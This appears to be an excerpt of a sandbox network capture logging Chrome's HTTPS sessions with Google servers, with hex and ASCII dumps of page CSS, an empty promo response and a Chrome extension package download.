0}.gb_Ha::before{display:inline-block;-webkit-transform:scale(.5);transform:scale(.5);-webkit-transform-origin:left 0;transform-origin:left 0}.gb_k .gb_Ha::before
2021-12-06 18:08:52 UTC	157	IN	Data Raw: 62 20 2e 67 62 5f 69 2e 67 62 5f 69 20 61 2e 67 62 5f 49 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 67 62 5f 69 2e 67 62 5f 69 20 2e 67 62 5f 4c 61 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 6f 70 61 63 69 74 79 3a 31 7d 2e 67 62 5f 44 20 2e 67 62 5f 43 61 3a 68 6f 76 65 72 2c 2e 67 62 5f 69 20 2e 67 62 5f 43 61 3a 68 6f 76 65 72 2c 2e 67 62 5f 44 20 2e 67 62 5f 43 61 3a 66 6f 63 75 73 2c 2e 67 62 5f 69 20 2e 67 62 5f 43 61 3a 66 6f 63 75 73 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 35 29 20 2c 20 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 20 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 Data Ascii: b .gb_i.gb_i a.gb_Ia{color:#fff}.gb_i.gb_i .gb_La{border-top-color:#fff;opacity:1}.gb_D .gb_Ca:hover,.gb_i .gb_Ca:hover,.gb_D .gb_Ca:focus,.gb_i .gb_Ca:focus{-webkit-box-shadow: 0 1px 0 rgba(0,0,0,.15) , 0 1px 2px rgba(0,0,0,.2) ;box-shadow: 0 1px 0 rgba(
2021-12-06 18:08:52 UTC	158	IN	Data Raw: 2e 67 62 5f 70 63 2e 67 62 5f 63 65 2c 2e 67 62 5f 70 63 3a 6e 6f 74 28 2e 67 62 5f 63 65 29 3a 6e 6f 74 28 3a 66 6f 63 75 73 29 7b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 7d 2e 67 62 5f 6f 61 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 2e 67 62 5f 73 63 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 69 6d 67 2e 67 62 5f 74 63 7b 62 6f 72 64 65 72 3a 30 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 2e 67 62 5f 45 63 20 2e 67 62 5f 70 63 20 2e 67 62 5f 62 65 3a 62 65 66 6f 72 65 2c 2e 67 62 5f 76 63 20 2e 67 62 5f 70 63 20 2e 67 62 5f 62 65 3a 62 65 66 6f 72 65 7b Data Ascii: .gb_pc.gb_ce,.gb_pc:not(.gb_ce):not(:focus){outline:none}.gb_oa{display:inline-block;vertical-align:middle}.gb_sc{border:none;display:block;visibility:hidden}img.gb_tc{border:0;vertical-align:middle}.gb_Ec .gb_pc .gb_be:before,.gb_vc .gb_pc .gb_be:before{
2021-12-06 18:08:52 UTC	160	IN	Data Raw: 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 34 70 78 7d 2e 67 62 5f 75 63 7b 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 30 20 34 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 68 65 69 67 68 74 3a 32 34 70 78 3b 77 69 64 74 68 3a 32 34 70 78 3b 2d 77 65 62 6b 69 74 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 7d 2e 67 Data Ascii: margin-bottom:4px}.gb_uc{-webkit-border-radius:50%;border-radius:50%;display:inline-block;margin:0 4px;padding:12px;overflow:hidden;vertical-align:middle;cursor:pointer;height:24px;width:24px;-webkit-user-select:none;-webkit-flex:0 0 auto;flex:0 0 auto}.g
2021-12-06 18:08:52 UTC	161	IN	Data Raw: 76 65 72 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 2e 67 62 5f 41 63 2e 67 62 5f 71 61 7b 77 69 64 74 68 3a 32 36 34 70 78 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 20 2d 32 36 34 70 78 20 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 20 2d 32 36 34 70 78 20 29 7d 2e 67 62 5f 41 63 3a 6e 6f 74 28 2e 67 62 5f 71 61 29 7b 77 69 64 74 68 3a 32 38 30 70 78 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 20 2d 32 38 30 70 78 20 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 20 2d 32 38 30 70 78 20 29 7d 2e 67 62 5f 44 63 20 2e 67 62 5f 41 63 7b 77 69 64 74 68 3a 31 39 35 70 78 7d 2e 67 62 5f 41 63 2e 67 62 5f 6c 61 Data Ascii: ver{overflow:visible}.gb_Ac.gb_qa{width:264px;-webkit-transform:translateX( -264px );transform:translateX( -264px )}.gb_Ac:not(.gb_qa){width:280px;-webkit-transform:translateX( -280px );transform:translateX( -280px )}.gb_Dc .gb_Ac{width:195px}.gb_Ac.gb_la
2021-12-06 18:08:52 UTC	162	IN	Data Raw: 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 35 66 36 33 36 38 7d 2e 67 62 5f 4f 63 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 67 62 5f 50 63 3a 65 6d 70 74 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 67 62 5f 4f 63 2c 2e 67 62 5f 50 63 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 34 30 70 78 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 34 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 52 6f 62 6f 74 6f 2c 52 6f 62 6f 74 6f 44 72 61 66 74 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 38 37 29 7d 2e 67 62 5f 45 63 20 2e 67 62 5f 4f 63 7b 63 6f 6c 6f 72 3a 23 65 38 Data Ascii: ottom:1px solid #5f6368}.gb_Oc{cursor:pointer}.gb_Pc:empty{display:none}.gb_Oc,.gb_Pc{display:block;min-height:40px;padding-bottom:4px;padding-top:4px;font-family:Roboto,RobotoDraft,Helvetica,Arial,sans-serif;color:rgba(0,0,0,0.87)}.gb_Ec .gb_Oc{color:#e8
2021-12-06 18:08:52 UTC	164	IN	Data Raw: 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 38 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 34 70 78 7d 2e 67 62 5f 70 61 3a 6e 6f 74 28 2e 67 62 5f 71 61 29 20 2e 67 62 5f 57 63 20 2e 67 62 5f 6e 63 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2e 67 62 5f 4d 63 20 2e 67 62 5f 6e 63 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 2d 63 65 6c 6c 3b 68 65 69 67 68 74 3a 34 38 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a Data Ascii: padding-bottom:8px;padding-left:24px}.gb_pa:not(.gb_qa) .gb_Wc .gb_nc{-webkit-box-align:center;-webkit-align-items:center;align-items:center;display:-webkit-box;display:-webkit-flex;display:flex}.gb_Mc .gb_nc{display:table-cell;height:48px;vertical-align:
2021-12-06 18:08:52 UTC	165	IN	Data Raw: 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 34 29 3b 77 69 64 74 68 3a 33 34 70 78 3b 68 65 69 67 68 74 3a 31 37 70 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 65 61 73 65 20 31 35 30 6d 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 65 61 73 65 20 31 35 30 6d 73 7d 2e 67 62 5f 71 66 5b 61 72 69 61 2d 70 72 65 73 73 65 64 5c 75 30 30 33 64 74 72 75 65 5d 20 2e 67 62 5f 72 66 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 35 35 2c 32 35 Data Ascii: x rgba(0,0,0,.24);width:34px;height:17px;-webkit-border-radius:8px;border-radius:8px;position:relative;-webkit-transition:background-color ease 150ms;transition:background-color ease 150ms}.gb_qf[aria-pressed\u003dtrue] .gb_rf{background-color:rgba(255,25
2021-12-06 18:08:52 UTC	166	IN	Data Raw: 34 70 78 7d 2e 67 62 5f 76 65 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 6f 70 61 63 69 74 79 3a 30 2e 35 34 7d 2e 67 62 5f 77 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 70 78 20 35 70 78 20 35 70 78 20 2d 33 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 32 29 2c 30 70 78 20 38 70 78 20 31 30 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 34 29 2c 30 70 78 20 33 70 78 20 31 34 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 32 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 70 78 20 35 70 78 20 35 70 78 20 2d 33 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 32 29 2c 30 70 78 20 38 70 78 20 31 30 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 Data Ascii: 4px}.gb_ve{color:black;opacity:0.54}.gb_we{background:white;-webkit-box-shadow:0px 5px 5px -3px rgba(0,0,0,0.2),0px 8px 10px 1px rgba(0,0,0,0.14),0px 3px 14px 2px rgba(0,0,0,0.12);box-shadow:0px 5px 5px -3px rgba(0,0,0,0.2),0px 8px 10px 1px rgba(0,0,0,0.1
2021-12-06 18:08:52 UTC	167	IN	Data Raw: 66 2e 67 62 5f 69 66 2c 2e 67 62 5f 6a 66 2e 67 62 5f 69 66 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 70 78 7d 2e 67 62 5f 6a 66 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 67 62 5f 68 66 2c 2e 67 62 5f 6a 66 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 7d 2e 67 62 5f 6b 66 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 30 3b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 74 6f 70 3a 30 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 6f 70 61 63 69 74 79 20 32 35 30 6d 73 20 65 61 73 65 2d 6f 75 74 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 6f 70 61 63 69 Data Ascii: f.gb_if,.gb_jf.gb_if{padding-left:2px;padding-right:2px}.gb_jf{display:none}.gb_hf,.gb_jf{float:left;position:absolute;top:0}.gb_kf{position:absolute;right:0;cursor:default;visibility:hidden;top:0;-webkit-transition:opacity 250ms ease-out;transition:opaci
2021-12-06 18:08:52 UTC	169	IN	Data Raw: 5f 4e 65 2e 67 62 5f 79 65 3a 6e 6f 74 28 2e 67 62 5f 4d 29 20 2e 67 62 5f 6e 66 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 67 62 5f 4e 65 2e 67 62 5f 79 65 2e 67 62 5f 4d 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 61 75 74 6f 7d 2e 67 62 5f 4e 65 2e 67 62 5f 79 65 2e 67 62 5f 4d 20 2e 67 62 5f 68 66 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 67 62 5f 4e 65 2e 67 62 5f 79 65 20 2e 67 62 5f 68 66 7b 70 61 64 64 69 6e 67 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 73 74 61 74 69 63 7d 2e 67 62 5f 4e 65 2e 67 62 5f 79 65 2e 67 62 5f 4d 20 2e 67 62 5f 6a 66 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 67 62 5f 70 61 2e 67 62 5f 48 63 20 2e 67 62 5f 45 64 2e 67 62 5f 78 65 3a 6e 6f 74 28 Data Ascii: _Ne.gb_ye:not(.gb_M) .gb_nf{display:none}.gb_Ne.gb_ye.gb_M{margin-left:0;position:absolute;width:auto}.gb_Ne.gb_ye.gb_M .gb_hf{display:none}.gb_Ne.gb_ye .gb_hf{padding:0;position:static}.gb_Ne.gb_ye.gb_M .gb_jf{display:block}.gb_pa.gb_Hc .gb_Ed.gb_xe:not(
2021-12-06 18:08:52 UTC	170	IN	Data Raw: 6e 7d 2e 67 62 5f 70 61 2e 67 62 5f 71 61 20 2e 67 62 5f 57 63 2c 2e 67 62 5f 46 64 2e 67 62 5f 4c 64 2e 67 62 5f 4d 64 5c 75 30 30 33 65 2e 67 62 5f 57 63 7b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3a 31 20 31 20 61 75 74 6f 3b 66 6c 65 78 3a 31 20 31 20 61 75 74 6f 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 67 62 5f 70 61 2e 67 62 5f 71 61 20 2e 67 62 5f 50 64 2c 2e 67 62 5f 46 64 2e 67 62 5f 4c 64 2e 67 62 5f 4d 64 5c 75 30 30 33 65 2e 67 62 5f 50 64 7b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 7d 73 65 6e 74 69 6e 65 6c 7b 7d 22 7d 7d 2c 22 70 61 67 65 5f 74 69 74 6c 65 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 70 61 67 65 2d 74 69 74 6c 65 22 2c 22 70 72 6f 64 Data Ascii: n}.gb_pa.gb_qa .gb_Wc,.gb_Fd.gb_Ld.gb_Md\u003e.gb_Wc{-webkit-flex:1 1 auto;flex:1 1 auto;overflow:hidden}.gb_pa.gb_qa .gb_Pd,.gb_Fd.gb_Ld.gb_Md\u003e.gb_Pd{-webkit-flex:0 0 auto;flex:0 0 auto}sentinel{}"}},"page_title_placeholder_label":"page-title","prod
2021-12-06 18:08:52 UTC	170	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49717	142.250.181.228	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-06 18:08:52 UTC	8	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2021-12-06 18:08:52 UTC	12	IN	HTTP/1.1 200 OK Version: 413663202 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff BFCache-Opt-In: unload Content-Disposition: attachment; filename="f.txt" Date: Mon, 06 Dec 2021 18:08:52 GMT Server: gws Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: CONSENT=PENDING+772; expires=Wed, 06-Dec-2023 18:08:52 GMT; path=/; domain=.google.com; Secure P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding Expires: Mon, 06 Dec 2021 18:08:52 GMT Connection: close Transfer-Encoding: chunked
2021-12-06 18:08:52 UTC	12	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2021-12-06 18:08:52 UTC	13	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49725	142.250.186.65	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-06 18:08:56 UTC	170	OUT	GET /crx/blobs/Acy1k0bLIjHsvnKaKN_oRpVaYYvFs25d7GKYF1WXrT6yizCMksBO0c_ggE0B6tx6HPRHe6q1GOEe3_NcIbSiGG8kXeLMUY0sAKVvC6R89zvKM13s5VqoAMZSmuUgjQL5vlygJuArQghXXE_qTL7NlQ/extension_8520_615_0_5.crx HTTP/1.1 Host: clients2.googleusercontent.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2021-12-06 18:08:56 UTC	171	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycdvvKSaa9fa8Te-3ZOrnxF-0UWK9l3vMqmlwazxRHTk0Iv-jWpXkJgVWezDk0k2FfVZflNf3Z7lBwJwGV0Phx0S2XGGkXA Content-Type: application/x-chrome-extension Content-Disposition: attachment; filename="extension_8520_615_0_5.crx" Cross-Origin-Resource-Policy: same-site ETag: 730d2491_a246e948_e80d9c94_d8b3f142_86eb8dd2 Last-Modified: Wed, 05 Aug 2020 01:15:29 GMT Accept-Ranges: bytes Date: Sun, 05 Dec 2021 19:07:53 GMT Expires: Mon, 05 Dec 2022 19:07:53 GMT X-Goog-Hash: crc32c=DxAZGA== Content-Length: 768843 Server: UploadServer Age: 82863 Cache-Control: public, max-age=31536000 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2021-12-06 18:08:56 UTC	172	IN	Data Raw: 43 72 32 34 03 00 00 00 18 04 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 8f fb bf 5c 37 63 94 3c b0 ee 01 c4 b5 a6 9a b1 9f 46 74 6f 16 38 a0 32 27 35 dd f0 71 6b 0e dc f6 25 cb b2 ed ea fb 32 d5 af 1e 03 43 03 46 f0 a7 39 db 23 96 1d 65 e5 78 51 f0 84 b0 0e 12 ac 0e 5b dc c9 d6 4c 7c 00 d5 b8 1b 88 33 3e 2f da eb aa f7 1a 75 c2 ae 3a 54 de 37 8f 10 d2 28 e6 84 79 4d 15 b4 f3 bd 3f 56 d3 3c 3f 18 ab fc 2e 05 c0 1e 08 31 b6 61 d0 fd 9f 4f 3f 64 0d 17 93 bc ad 41 c7 48 be 00 27 a8 4d 70 42 92 05 54 a6 6d b8 de 56 6e 20 49 70 ee 10 3e 6b d2 7c 31 bd 1b 6e a4 3c 46 62 9f 08 66 93 f9 2a 51 31 a8 db b5 9d b9 0f 73 e8 a0 09 32 01 e9 7b 2a 8a 36 a0 cf 17 b0 50 70 9d a2 f9 a4 6f 62 4d Data Ascii: Cr240"0H0\7c<Fto82'5qk%2CF9#exQ[L\|3>/u:T7(yM?V<?.1aO?dAH'MpBTmVn Ip>k\|1n<FbfQ1s2{*6PpobM
2021-12-06 18:08:56 UTC	172	IN	Data Raw: 40 3b f4 9e 6a bc a6 ca cb a3 80 eb 8b 1c a8 07 a9 3d 61 65 c8 c2 d3 30 c2 ff f6 cc 90 8b f9 14 44 55 b1 1f a8 1a 6e 1c 91 f5 6e 12 3b ff 49 70 72 cc a2 1f 51 db 15 1c 81 3a 10 b6 e5 20 3c e2 ad 87 0f d5 1e 80 61 09 59 dc 93 f3 83 96 97 87 7b 65 69 9e cd 12 a8 02 0a a2 01 30 81 9f 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 81 8d 00 30 81 89 02 81 81 00 cd 4d 62 68 3d 9f 5b 4f 7d b2 2b 1b ae 55 af 4b 48 46 28 6e 33 e8 5c 22 d7 dd d8 2c 67 d7 63 0e b5 8a 36 29 13 10 28 dd 45 ed ff 00 55 db fa ff 23 92 69 ad 61 03 e7 3a 04 98 9f 4e 89 fd 0a 1d 0e 50 88 1b a9 78 ef 4f a0 90 ea 28 6d 43 3b 7c eb 35 01 53 ac 7b 6d ea 61 45 78 8d bb 91 5b 7f 98 66 50 af 69 60 85 79 cc c2 35 b1 88 52 02 84 8b 90 76 7f 24 1a cf 2e b4 00 bd 6c 2d 6d ee b5 02 03 01 00 01 12 80 Data Ascii: @;j=ae0DUnn;IprQ: <aY{ei00*H0Mbh=[O}+UKHF(n3\",gc6)(EU#ia:NPxO(mC;\|5S{maEx[fPi`y5Rv$.l-m
2021-12-06 18:08:56 UTC	173	IN	Data Raw: f6 ad c7 4a cb 2f 1f 77 0d f5 97 97 c5 5f 2f ee 4b 21 c4 5f 5e de 7e 29 ae 9a 3f 8a c1 c7 9b f2 f2 e7 8b 83 8f 77 77 5f 6e 7f 7a f9 f2 f6 fe cb 97 eb 9b bb 17 1f 6a 3b be 58 5f ff fa 72 bd d5 ec cb e2 ea f6 df e5 cd 4b 08 bb 2a 89 5f 1c 0c ee 8a 9b 0f e5 1d 8c 5f ae 3e 17 57 ff bc 38 68 04 57 0f 19 ac 3f 17 b7 b7 70 f1 a6 fc d7 fd a7 9b 72 f3 3c ce 08 06 5e 7d 78 7e fb f1 fa df 70 f1 7f ee ae bf bc b8 bd bf bc fc b4 fe 04 8b 3b 2e cb cd aa 58 57 a2 6a 15 40 46 b0 99 55 06 9e 99 69 25 32 27 d9 60 40 0f c3 54 2a 57 e8 61 24 24 d0 59 30 1d a0 d3 c5 2c ef b6 1e 00 31 f7 64 d3 b3 96 91 0f 99 4e 45 d3 31 4b 63 4d 47 0d f6 3b ea d5 06 08 c9 60 85 f7 ca 04 25 25 9f d1 eb e0 30 31 ee e2 c8 60 5c 26 20 9b 40 82 ca bc 08 da b0 e5 57 6c c7 37 d9 13 d3 66 94 a2 02 c8 Data Ascii: J/w_/K!_^~)?ww_nzj;X_rK__>W8hW?pr<^}x~p;.XWj@FUi%2'`@TWa$$Y0,1dNE1KcMG;`%%01`\& @Wl7f
2021-12-06 18:08:56 UTC	175	IN	Data Raw: 5d 60 c4 24 86 5a 22 50 76 a3 9d 09 c2 58 61 80 31 5b de 09 1f d7 40 b6 42 55 3d 6c 6f 80 83 85 4c 08 e3 be 83 df 3c 6c 95 58 00 2b 52 42 5c b4 a3 e9 e8 90 f5 00 4c fc b4 1c 95 ad 07 ab 8d 6f 6f 8d 54 81 3a aa a3 88 45 b7 9f db fc b8 cd 34 1c a4 2f c8 d3 56 ad 05 64 e8 c5 c2 1d 97 6b ff e8 92 ca 4d fa c0 82 a0 9b cd 2a c5 b6 b8 32 0a bc d8 f0 a7 fd f9 1d 53 75 85 47 b6 62 5b 97 15 31 5f ec 34 e8 4b 82 df 3b dd f5 26 a3 7f 47 af 7c 4f 33 bc 69 98 32 ae b8 bf d7 fd c4 f6 f6 dd cd f5 fd ea 73 79 fb f1 fa fa 0e db dc 56 69 d7 74 4c 2d f0 51 c0 2e ca 67 19 00 85 20 ac 64 d1 02 96 dd 08 6b 75 1c 99 59 5b 6d c2 d8 10 64 d5 21 60 db 48 3b c1 17 9b 72 85 d9 7a 55 d3 94 b3 da 5b 88 6f ed 83 75 3a 28 eb d8 8e 03 44 7d 1d 23 9d 94 a5 77 f7 49 08 6d 8c f6 c4 ac 17 7b Data Ascii: ]`$Z"PvXa1[@BU=loL<lX+RB\LooT:E4/VdkM*2SuGb[1_4K;&G\|O3i2syVitL-Q.g dkuY[md!`H;rzU[ou:(D}#wIm{
2021-12-06 18:08:56 UTC	176	IN	Data Raw: 12 a8 5f c5 66 cd c3 99 c5 91 4d 0d 49 77 54 3b 27 68 d1 9c 97 d4 bf 7b 33 52 9b 72 ba 09 24 e6 1f 9c a8 95 56 1a 6f 24 00 7c 40 f9 19 f8 30 37 d3 e6 d4 62 1c 03 d3 94 36 68 11 94 87 e9 3b b5 67 77 22 7d 31 81 0d 1f 30 71 80 3c ec a4 b4 42 54 d1 c3 35 69 38 22 ec 33 e1 aa 6d 2e 51 6d bb 18 e0 59 66 cf 0b 0c 0f 70 d9 d8 d4 a2 fb 54 a1 a3 e3 76 9c 26 87 3b e2 9e 47 db bf 69 0a 4c a8 7a 35 e0 b4 32 78 98 5f f0 c0 fe bf 7b 6e 0d 7a 41 c1 15 1a 87 ac ed aa c2 65 ab 73 76 7b 28 59 ef 09 08 94 0f 15 ea ed f9 b8 9e b5 26 fe 56 14 e4 a7 82 b2 0f 86 9d 94 7e 3c 9c a1 0a eb 03 a7 f1 38 22 a2 f5 35 e6 21 34 3d a9 cb cd 69 05 ec 3e 56 a7 a1 33 e1 bd f6 0a a2 05 c2 86 ed a8 fd 8e 3b 8d 4f df ce 8d 00 86 c8 e0 4e 48 3d 79 a7 f6 2c 3f 1a 0d 97 d3 c9 62 9e 4f 97 c3 a3 a3 Data Ascii: _fMIwT;'h{3Rr$Vo$\|@07b6h;gw"}10q<BT5i8"3m.QmYfpTv&;GiLz52x_{nzAesv{(Y&V~<8"5!4=i>V3;ONH=y,?bO
